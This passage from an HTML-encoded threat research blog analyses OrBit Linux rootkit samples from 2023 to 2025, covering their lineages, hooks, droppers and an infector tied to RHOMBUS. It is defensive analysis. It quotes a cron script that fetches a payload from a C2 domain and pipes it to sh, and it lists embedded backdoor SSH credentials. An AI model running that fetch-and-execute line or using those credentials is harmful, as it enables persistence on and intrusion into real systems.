&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mo"&gt;004172&lt;/span&gt;&lt;span class="n"&gt;af&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;uint64_t&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;bytes_read&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mo"&gt;0041724&lt;/span&gt;&lt;span class="mi"&gt;9&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h4&gt;3ba6c174 / 4203271c: Lineage B lite build&lt;span class="hx:absolute hx:-mt-20" id="3ba6c174--4203271c-lineage-b-lite-build"&gt;&lt;/span&gt;
&lt;a href="#3ba6c174--4203271c-lineage-b-lite-build" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Both files, 3ba6c174 and 4203271c, represent the first appearance of Lineage B,
a deliberately lite fork of the OrBit rootkit. Both are dynamically linked
shared objects using the standard 0xA2 XOR key and installed in
&lt;code&gt;/lib/libseconf/&lt;/code&gt;, but they export only 54 functions, compared to the 67 in
their closest Lineage A contemporaries (d419a9b1, ec7462c3). The 13 removed
exports strip out three entire capability domains: network port-hiding
(alloc_tcp_ports, remove_port, tcp_port_hidden, clean_ports), PAM credential
interception (pam_authenticate, pam_acct_mgmt, pam_open_session,
pam_get_password), and packet capture (pcap_loop, pcap_packet_callback). The
string table reflects this (.logpam and .udp are absent), though .ports,
.hosts, and sshpass2.txt are retained. This reduced feature set suggests they
were purpose-built for different target environments where a smaller footprint
or more limited functionality was either sufficient or preferred.&lt;/p&gt;
&lt;p&gt;The most notable change is the complete absence of a backdoor password. Every
Lineage A sample embeds a password in its XOR-encrypted string block, but in
both &lt;code&gt;3ba6c174&lt;/code&gt; and &lt;code&gt;4203271c&lt;/code&gt;, the password field is missing. Each sample
carries a distinct username (&lt;code&gt;adm1n&lt;/code&gt; and &lt;code&gt;b4ph0m3t0&lt;/code&gt;, respectively), and these
are the only byte-level differences between the two binaries. This pattern of
54 exports, no password, no PAM/pcap hooks, held consistent across all
subsequent Lineage B samples through 2024.&lt;/p&gt;
&lt;h3&gt;Samples From 2024&lt;span class="hx:absolute hx:-mt-20" id="samples-from-2024"&gt;&lt;/span&gt;
&lt;a href="#samples-from-2024" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Hash&lt;/th&gt;
&lt;th&gt;XOR&lt;/th&gt;
&lt;th&gt;Working dir&lt;/th&gt;
&lt;th&gt;SSH Username&lt;/th&gt;
&lt;th&gt;SSH Password&lt;/th&gt;
&lt;th&gt;# Exports&lt;/th&gt;
&lt;th&gt;# Hooks&lt;/th&gt;
&lt;th&gt;Dropper&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;eea274ed&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0xAA&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/lib64/libseconf/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Y0u4reCu6e&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;1qaz@WSX3edc123&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;66&lt;/td&gt;
&lt;td&gt;54&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;a6138638&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0xAA&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/lib/locate/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Y0u4reCu6e&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;1qaz@WSX3edc123&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;66&lt;/td&gt;
&lt;td&gt;54&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;a34299a1&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0xA2&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/lib/libseconf/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;rebel&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;(not present)&lt;/td&gt;
&lt;td&gt;56&lt;/td&gt;
&lt;td&gt;49&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;b1dd18a6&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0xA2&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/lib/libseconf/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Gestuff&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;(not present)&lt;/td&gt;
&lt;td&gt;54&lt;/td&gt;
&lt;td&gt;49&lt;/td&gt;
&lt;td&gt;&lt;code&gt;fc2e0cb6&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;989f7eb4&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0xA2&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/lib/libseconf/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;adm1n&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;(not present)&lt;/td&gt;
&lt;td&gt;54&lt;/td&gt;
&lt;td&gt;49&lt;/td&gt;
&lt;td&gt;&lt;code&gt;48a68d05&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;2024 is the most diverse epoch in OrBit&amp;rsquo;s timeline, with both lineages active
simultaneously and an encryption key change in the Lineage A branch.&lt;/p&gt;
&lt;h4&gt;eea274ed / a6138638: Lineage A, 0xAA key rotation&lt;span class="hx:absolute hx:-mt-20" id="eea274ed--a6138638-lineage-a-0xaa-key-rotation"&gt;&lt;/span&gt;
&lt;a href="#eea274ed--a6138638-lineage-a-0xaa-key-rotation" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;These two samples belong to the same lineage: identical XOR key (0xAA is a
break from the long-standing 0xA2), identical credentials (&lt;code&gt;Y0u4reCu6e&lt;/code&gt; /
&lt;code&gt;1qaz@WSX3edc123&lt;/code&gt;), and identical hook count (54). The only structural
difference is the install path: &lt;code&gt;/lib64/libseconf/&lt;/code&gt; versus &lt;code&gt;/lib/locate/&lt;/code&gt;. This
is probably a deliberate path rotation to evade detections anchored on the
previously documented &lt;code&gt;/lib/libseconf/&lt;/code&gt; directory. Credentials are stored
inline in the XOR-encrypted block rather than written to &lt;code&gt;sshpass.txt&lt;/code&gt;,
representing a shift in the credential storage model. Both samples also have a
reduced hook for the&amp;rsquo; execve&amp;rsquo; function: the &lt;code&gt;execve&lt;/code&gt; hook handles persistence
maintenance (apt/yum), output sanitization (dmesg), and ldd defeat. Compared to
other samples in the lineage, it is a reduced feature set: no strace
interception, no IP/iptables hooks, no command logging.&lt;/p&gt;
&lt;p&gt;Despite sharing the same hook count, the two samples do not share the same hook
set. &lt;code&gt;a6138638&lt;/code&gt; swaps read/write for readdir_r/readdir64_r, indicating a
targeted adjustment to the directory-hiding mechanism. A string-level diff
reveals more changes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Credential harvesting is saved in &lt;code&gt;remote.txt&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;This variant captures only SSH logins, not sudo sessions (&lt;code&gt;[sudo] pass&lt;/code&gt; is
missing).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The result is 52 decoded XOR strings in &lt;code&gt;eea274ed&lt;/code&gt; versus 47 in &lt;code&gt;a6138638&lt;/code&gt;.
Both samples retain &lt;code&gt;.udp&lt;/code&gt;, &lt;code&gt;.pts&lt;/code&gt;, and the credential pair, preserving the
core backdoor functionality. The removals target logging and forensic-capture
features, suggesting &lt;code&gt;a6138638&lt;/code&gt; was tailored for a deployment where a lighter
footprint was preferred.&lt;/p&gt;
&lt;h4&gt;a34299a1 / b1dd18a6 / 989f7eb4: Lineage B continuation&lt;span class="hx:absolute hx:-mt-20" id="a34299a1--b1dd18a6--989f7eb4-lineage-b-continuation"&gt;&lt;/span&gt;
&lt;a href="#a34299a1--b1dd18a6--989f7eb4-lineage-b-continuation" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;These samples continue the 54-export lite build lineage that first appeared in
2023 with &lt;code&gt;3ba6c174&lt;/code&gt;/&lt;code&gt;4203271c&lt;/code&gt;. The hook set is identical (49 hooks), the XOR
key remains 0xA2, and the same capability domains are absent: no PAM credential
interception, no pcap sniffing, no TCP port hiding. The password field is still
missing from the binary. Each sample carries a distinct username (&lt;code&gt;rebel&lt;/code&gt;,
&lt;code&gt;Gestuff&lt;/code&gt;, &lt;code&gt;adm1n&lt;/code&gt;, respectively), consistent with the Lineage B pattern of
per-deployment username rotation, with no corresponding password.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;989f7eb4&lt;/code&gt; is the payload extracted from the &lt;code&gt;48a68d05&lt;/code&gt; dropper. It was not on
VT; we uploaded it.&lt;/p&gt;
&lt;h3&gt;Samples From 2025&lt;span class="hx:absolute hx:-mt-20" id="samples-from-2025"&gt;&lt;/span&gt;
&lt;a href="#samples-from-2025" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Hash&lt;/th&gt;
&lt;th&gt;XOR&lt;/th&gt;
&lt;th&gt;Working dir&lt;/th&gt;
&lt;th&gt;SSH Username&lt;/th&gt;
&lt;th&gt;SSH Password&lt;/th&gt;
&lt;th&gt;# Exports&lt;/th&gt;
&lt;th&gt;# Hooks&lt;/th&gt;
&lt;th&gt;Role&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;8e83cbb2&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0xA2&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/lib/libseconf/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;infinity&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;302010&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;66&lt;/td&gt;
&lt;td&gt;54&lt;/td&gt;
&lt;td&gt;payload .so&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;2b2eeb22&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0xA2&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/lib/libseconf/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;adm1n&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;asdfasdf&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;64&lt;/td&gt;
&lt;td&gt;54&lt;/td&gt;
&lt;td&gt;payload .so (extracted from &lt;code&gt;d3d204c1&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;84828f31&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0xA2&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/lib/libseconf/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;adm1n&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;asdfasdf&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;64&lt;/td&gt;
&lt;td&gt;54&lt;/td&gt;
&lt;td&gt;truncated copy of &lt;code&gt;2b2eeb22&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;090b15fd&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;dropper (carries &lt;code&gt;8e83cbb2&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;64a3ebd3&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;dropper (carries &lt;code&gt;8e83cbb2&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;b85ed157&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;dropper (carries &lt;code&gt;8e83cbb2&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;d3d204c1&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;dropper (carries &lt;code&gt;2b2eeb22&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;73b95b7d&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;&amp;mdash;&lt;/td&gt;
&lt;td&gt;infector (carries 090b15fd as inner ELF)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;The 2025 epoch marks two significant capability additions to Lineage A and
confirms the rootkit&amp;rsquo;s return to the 0xA2 encryption key after the 2024 0xAA
experiment.&lt;/p&gt;
&lt;p&gt;Two distinct rootkit .so builds are present in 2025, both Lineage A:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;8e83cbb2&lt;/code&gt; represents the most capable build to date. Its 66-export set
includes a significant new hook not seen in any prior variant:
&lt;code&gt;pam_sm_authenticate&lt;/code&gt;. This is the PAM service-side authentication function,
meaning the rootkit now hooks both sides of the PAM stack. Where earlier
variants could only passively capture credentials via client-side
&lt;code&gt;pam_authenticate&lt;/code&gt;, this build can also forge authentication outcomes, allowing
the attacker to approve or deny login attempts at will. The export set also
includes &lt;code&gt;xread&lt;/code&gt;, first seen in &lt;code&gt;296d28eb&lt;/code&gt; (2023).&lt;/p&gt;
&lt;p&gt;&lt;code&gt;2b2eeb22&lt;/code&gt; is a second Lineage A payload with 64 exports. XOR 0xA2 decode
confirms credentials &lt;code&gt;adm1n&lt;/code&gt;/&lt;code&gt;asdfasdf&lt;/code&gt;, the same operator behind &lt;code&gt;ec7462c3&lt;/code&gt;
(2022), &lt;code&gt;296d28eb&lt;/code&gt; (2023), and the &lt;code&gt;26082cd3&lt;/code&gt; inner payload (2024), now
spanning four years. &lt;code&gt;84828f31&lt;/code&gt; is a truncated copy of &lt;code&gt;2b2eeb22&lt;/code&gt; (same
BuildID: &lt;code&gt;cbc9724027399723a27daa4114ffcdf906cb802f&lt;/code&gt;, identical bytes up to
107KB, missing the trailing 102KB containing section headers and symbol
tables), it is likely an incomplete extraction or download artifact. It is not
a distinct sample.&lt;/p&gt;
&lt;p&gt;XOR 0xA2 string decode of both payloads confirms the full Lineage A string set
is restored: &lt;code&gt;sshpass.txt&lt;/code&gt; and &lt;code&gt;sshpass2.txt&lt;/code&gt; both present, plus &lt;code&gt;.logpam&lt;/code&gt;,
&lt;code&gt;.udp&lt;/code&gt;, &lt;code&gt;.ports&lt;/code&gt; (×2), &lt;code&gt;/proc/net/tcp&lt;/code&gt;. The string removals introduced by the
2024 0xAA cluster (&lt;code&gt;a6138638&lt;/code&gt;&amp;rsquo;s missing &lt;code&gt;local.txt&lt;/code&gt;, &lt;code&gt;sniff.txt&lt;/code&gt;, etc.) were
not carried forward, and both builds return to the comprehensive logging and
credential-capture model.&lt;/p&gt;
&lt;h4&gt;Dropper Samples&lt;span class="hx:absolute hx:-mt-20" id="dropper-samples"&gt;&lt;/span&gt;
&lt;a href="#dropper-samples" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;&lt;code&gt;090b15fd&lt;/code&gt;, &lt;code&gt;64a3ebd3&lt;/code&gt;, and &lt;code&gt;b85ed157&lt;/code&gt; are statically linked ELF executables
that carry &lt;code&gt;8e83cbb2&lt;/code&gt; as an embedded .so and share the same
&lt;code&gt;Build ID: da256c78910c552eb334814ada85c7655b717c4f&lt;/code&gt;. &lt;code&gt;d3d204c1&lt;/code&gt; is the same
type of dropper carrying &lt;code&gt;2b2eeb22&lt;/code&gt;. All four share the same architecture first
seen in &lt;code&gt;f1612924&lt;/code&gt; (from 2022).&lt;/p&gt;
&lt;h5&gt;73b95b7d: A New Dropper Architecture&lt;span class="hx:absolute hx:-mt-20" id="73b95b7d-a-new-dropper-architecture"&gt;&lt;/span&gt;
&lt;a href="#73b95b7d-a-new-dropper-architecture" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;&lt;code&gt;73b95b7d&lt;/code&gt; is not just a dropper, it is an infector that carries the dropper as
an embedded payload. This creates a two-stage delivery chain: infector →
dropper → rootkit.&lt;/p&gt;
&lt;p&gt;The inner binary (&lt;code&gt;090b15fd&lt;/code&gt;, embedded at file offset &lt;code&gt;0x20d7&lt;/code&gt;) is the dropper
we previously saw. The infector&amp;rsquo;s role is propagation and persistence; the
dropper&amp;rsquo;s role is to extract and install the rootkit &lt;code&gt;.so&lt;/code&gt; via &lt;code&gt;ld.so.preload&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The infector scans the filesystem for ELF binaries and injects the second-stage
payload into them. An infection marker &lt;code&gt;bongripz4jezuz&lt;/code&gt; (stored in base64
encoding as: &lt;code&gt;Ym9uZ3JpcHo0amV6dXoK&lt;/code&gt;) is checked before each infection attempt
to avoid re-infecting the same target. The injected binaries include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;/bin/ls&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;All 64-bit ELF files in the current working directory that have read/write
access.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Additionally, &lt;code&gt;/etc/cron.hourly/0&lt;/code&gt; is created as a persistence mechanism (to
download and execute a remote payload), though it is a shell script rather than
an ELF injection target.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="cp"&gt;#!/bin/sh
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="cp"&gt;&lt;/span&gt;wget --quiet http://cf0&lt;span class="o"&gt;[&lt;/span&gt;.&lt;span class="o"&gt;]&lt;/span&gt;pw/0/etc/cron.hourly/0 -O- 2&amp;gt;/dev/null&lt;span class="p"&gt;|&lt;/span&gt;sh&amp;gt;/dev/null 2&amp;gt;&lt;span class="p"&gt;&amp;amp;&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;This is the first OrBit component with any form of C2 communication. Every
previous version was a purely passive implant, meaning the attacker connected
via the SSH backdoor.&lt;/p&gt;
&lt;p&gt;This introduces an external command channel that can deliver updated payloads
or instructions, adding a reinfection mechanism on top of &lt;code&gt;ld.so.preload&lt;/code&gt;
persistence.&lt;/p&gt;
&lt;p&gt;The earlier droppers stored all paths and commands as plaintext. &lt;code&gt;73b95b7d&lt;/code&gt; is
the first dropper to implement string protection: a custom substitution cipher
using two lookup tables at &lt;code&gt;.data&lt;/code&gt; offsets for the cipher and plain, each with
88 entries, defining a character-by-character mapping. Notably, this is a
different scheme from the XOR encryption used by the previous rootkit payloads.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-c++" data-lang="c++"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;mw_plain_table&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mh"&gt;0x4e&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;&amp;#34;0123456789abcdefghijklmnopqrstuvzywxABCDEFGHIJKLMNOPQRSTUVZYWX|:. !#-/;&amp;amp;*&lt;/span&gt;&lt;span class="se"&gt;\&amp;#39;\&amp;#34;\n\r&lt;/span&gt;&lt;span class="s"&gt;&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;mw_cipher_table&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mh"&gt;0x58&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;&amp;#34;&amp;lt;&amp;gt;@o$:,.l+*^?=)(|AB&amp;amp;%;D!wkUxzvutsrqp_nm-ihgfFCcba~K23456789eyd1XSNQWTZMIRHGVOYLjPJE/][&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h5&gt;Connection to RHOMBUS&lt;span class="hx:absolute hx:-mt-20" id="connection-to-rhombus"&gt;&lt;/span&gt;
&lt;a href="#connection-to-rhombus" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;The structure of this dropper, which delivers the OrBit payload in the final
stage, is identical to that described in this
&lt;a href="https://blog.apnic.net/2020/05/22/rhombus-a-new-iot-malware/"target="_blank" rel="noopener"&gt;APNIC blog&lt;/a&gt; that
analyzed a dropper that delivered RHOMBUS malware.&lt;/p&gt;
&lt;p&gt;Rhombus is a Linux-based botnet malware first reported in February 2020 by the
&lt;a href="https://old.reddit.com/r/LinuxMalware/comments/fh3zar/memo_rhombus_an_elf_bot_installerdropper/"target="_blank" rel="noopener"&gt;MalwareMustDie research group&lt;/a&gt;,
which analyzed and shared samples of it. It acts as an installer/dropper that
persists on infected devices, drops a second-stage payload, and then uses the
compromised system for DDoS activity. The target systems are VPS and IoT
devices. (SHA256 of the dropper:
&lt;code&gt;b982276458a85cd3dd7c8aa6cb4bbb2d4885b385053f92395a99abbfb0e43784&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;Interestingly, the dropper &lt;code&gt;73b95b7d&lt;/code&gt; that delivers the OrBit payload in the
final stage is identical to the one used in the Rhombus campaign 6 years ago.
Coincidentally, both droppers use the same domain to download the payload as
part of the cron-job-based persistence. The current resolution of the domain is
to &lt;code&gt;109.95.212[.]253&lt;/code&gt;. The host has a unique BANNER_0_HASH-IP value,
&lt;code&gt;ba0c31785465186600a76b7af2a37aa6&lt;/code&gt;, that is shared with only one other IP,
&lt;code&gt;109.95.211[.]141&lt;/code&gt;, as shown in the screenshot below from Validin. Based on the
ASN resolution, both IP addresses are located in Russia.&lt;/p&gt;
&lt;p&gt;The fact that the OrBit dropper shares the same domain as malware from 6 years
ago can also be interpreted as an attempt to mislead researchers; therefore, we
are not taking this evidence into account for attribution at this moment.
However, it is worth noting that this connection exists.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2026/05/orbit-returns/images/fig1.png" title="Shared BANNER_0_HASH-IP value." alt="Screenshot from Validin showing the two IPs sharing the same banner hash." loading="lazy" /&gt;
&lt;figcaption&gt;Shared BANNER_0_HASH-IP value.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2026/05/orbit-returns/images/fig2.png" title="Resolution of http://cf0[.]pw" alt="Screenshot from Validin showing the resolution of a domain to one of the IP addresses" loading="lazy" /&gt;
&lt;figcaption&gt;Resolution of http://cf0[.]pw&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
